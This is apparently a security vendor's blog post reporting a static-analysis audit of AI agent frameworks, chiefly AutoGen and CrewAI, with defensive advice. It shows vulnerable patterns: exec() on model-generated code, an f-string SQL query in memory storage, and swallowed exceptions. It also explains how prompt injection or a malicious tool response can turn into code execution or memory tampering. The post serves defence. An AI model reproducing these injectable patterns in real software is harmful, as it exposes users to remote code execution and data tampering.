Security ResearchMarch 21, 2026·11 min read

We Audited Every Major AI Agent Framework.Here's What We Found.

We ran CodeSlick against the source code of the most-used AI agent frameworks. All of them had serious issues. But agent frameworks compound risk: they run your agents, execute generated code, handle secrets, and persist state between autonomous actions.

6
Frameworks scanned
916
Vulnerabilities (new)
136
Critical findings
1,181
Files analyzed

What We Scanned

New audits: AutoGen and CrewAI. Combined with previously published results for LangChain, Vercel AI, OpenAI, and MCP Servers.

FrameworkStarsFilesTotalCriticalHigh
microsoft/autogenNEW~40k4224906185
crewAIInc/crewAINEW~25k7594267581
langchain-ai/langchainjs~13k~3,2008,650200
vercel/ai~9k~2,10010,46017
openai/openai-node~8k1,1051
modelcontextprotocol/servers1401

Scan date: March 2026. CodeSlick v20260319 (306 security checks). Shallow clone, full repo surface.

AutoGen: exec() as Architecture

AutoGen is Microsoft's multi-agent framework built around one idea: LLM agents write Python code, and the framework runs it. CodeSlick flagged 16 uses of eval() / exec() / compile() as critical — and they're not bugs. They're the entire point of AutoGen. The CodeExecutorAgent literally calls exec() on code generated by the LLM.

AutoGen — CodeExecutorAgent (simplified)
exec(generated_code, namespace)
# CodeSlick: CRITICAL — eval-usage (CVSS 9.8, CWE-78)

Why this matters when you build on AutoGen: any prompt injection that reaches the code generator can produce exec()payloads that run in your environment. AutoGen has sandboxing options (Docker execution), but many deployments skip them. If your AutoGen agent has file system or network access and you're not using Docker isolation — an adversarial prompt that reaches the LLM can execute arbitrary code.

Other AutoGen findings

  • 4 insecure deserialization — agent state is pickled/unpickled without validation. Attacker-controlled agent state can achieve RCE via crafted pickle payloads.
  • 1 command injection — subprocess call with unsanitized input
  • 27 missing input validation patterns — agents receiving external data don't sanitize before use
  • 34 silent exception suppressions — agent loop continues with corrupted state on failure

CrewAI: SQL Injection in an Agent Orchestrator

CrewAI is the "role-playing agents" framework — you define crew members with roles and they collaborate on tasks. It's the second most popular agent framework after AutoGen. The most surprising finding: SQL injection in the framework's storage layer.

CrewAI — memory storage (from scan)
query = f"SELECT * FROM tasks WHERE id = {task_id}"
# CodeSlick: CRITICAL — sql-injection (CVSS 9.8, CWE-89)

CrewAI stores crew memory, task outputs, and tool results. SQL injection here means an attacker who can influence task outputs — through a malicious tool response, for example — can manipulate the crew's memory database. Agent output becomes an injection vector.

Other CrewAI findings

  • 9 eval() / exec() calls — tool execution and code evaluation
  • 1 hardcoded credential in config objects
  • 71 silent exception suppressions — highest concentration in tool and memory modules
  • 23 AI-generated code patterns detected — CodeSlick detected AI-written code inside CrewAI itself (hallucinated method names and over-engineered patterns)

The Pattern Both Share: Silent Exception Suppression

This is the finding that worries us most for production agent systems.

Pattern found 34× in AutoGen, 71× in CrewAI
try:
    result = agent.run(task)
except Exception:
    pass  # CodeSlick: silent-exception-suppression (CWE-390)

In a normal web app, a swallowed exception means one request fails silently. In an agent pipeline, it means the agent loop continues with corrupted state. The next agent in the chain receives a None result, infers a default, and the pipeline completes — looking successful to the orchestrator while producing garbage output.

Worse: silent failures in agent loops can create retry storms. If an agent tool silently fails, the LLM may retry indefinitely, consuming tokens and time, before the orchestrator times out.

Triage note: the request package

Both repos triggered the known-malicious-package check for "request" (16× in AutoGen, 9× in CrewAI). This is CodeSlick flagging request (singular) — a known typosquat of the legitimate requests library — found in example scripts and test fixtures. Worth flagging even in test code, but not production dependencies. Post-triage adjusted critical counts: AutoGen 45 critical (down from 61), CrewAI 66 critical (down from 75). Still severe.

Risk Comparison Across All 6 Frameworks

Low
openai/openai-node
Client SDK, minimal logic, few findings
Low
modelcontextprotocol/servers
Small, focused, mostly example code
Medium
vercel/ai
Many findings, but mostly infrastructure-level; lower critical density
High
crewAIInc/crewAI
SQL injection in storage, eval in tool execution, silent failures throughout
Very High
microsoft/autogen
exec() is architecture, not an accident; deserialization risk on agent state
Very High
langchain-ai/langchainjs
200 critical, highest volume in the dataset

What to Do If You Build on These

Building on AutoGen

  • Never skip Docker/sandbox execution. The exec() surface is real. Sandboxed execution is not optional for production.
  • Validate all agent inputs before they reach the code generator.
  • Don't trust agent state loaded from external storage — pickle deserialization of untrusted state is RCE.

Building on CrewAI

  • Audit your tool implementations for SQL injection if you store crew memory to a database.
  • Treat tool outputs as untrusted data — don't interpolate them into queries or commands.
  • Add logging to exception handlers in agent pipelines — silent failures destroy reliability.

For all agent frameworks

  • Pin your dependencies and run pip-audit / npm audit on lock files regularly.
  • Run a static analyzer against your own agent code — not just the framework you build on.
  • The framework's security posture sets a floor, not a ceiling. Your agent code adds more surface.

Audit Data is Open

All scan results are in our public audit repository:

github.com/VitorLourenco/ai-sdk-security-audits
autogen-clean.json
crewai-clean.json
agent-frameworks-summary.json

Run This on Your Own Agent Code

The framework's security posture is a baseline. Your code adds more surface.

# CLI — free, no account needed
npx codeslick scan --all ./my-agent-project
Back to Blog
Security ResearchAI AgentsAutoGenCrewAISAST